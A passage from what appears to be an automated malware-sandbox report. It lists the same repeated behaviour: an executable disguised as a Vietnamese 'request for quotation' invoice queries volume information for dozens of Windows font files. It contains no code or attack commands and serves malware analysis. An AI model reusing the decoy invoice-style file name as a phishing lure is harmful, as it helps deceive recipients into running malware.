Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation Jump to behavior
